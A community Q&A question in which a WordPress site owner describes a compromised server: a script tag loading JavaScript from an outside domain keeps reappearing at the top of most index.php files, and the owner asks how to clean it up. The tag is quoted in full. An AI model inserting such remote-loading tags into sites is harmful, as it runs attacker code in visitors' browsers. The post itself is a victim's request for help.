Question
My wordpress site got hacked with script malware added
Guys, I am in a big trouble. My web server got hacked. I noticed this script tag
<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>
at top of almost every index.php file. When I try to remove it, it automatically rewrite the file after i save. Keeping that in mind and after seeing all website running on same server (only php sites), I came to a conclusion that this is not a simple php script attack, it just hacked my whole server.
Any idea what it might be? How I can remove that malware? Should I reinstall ubuntu?
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.
×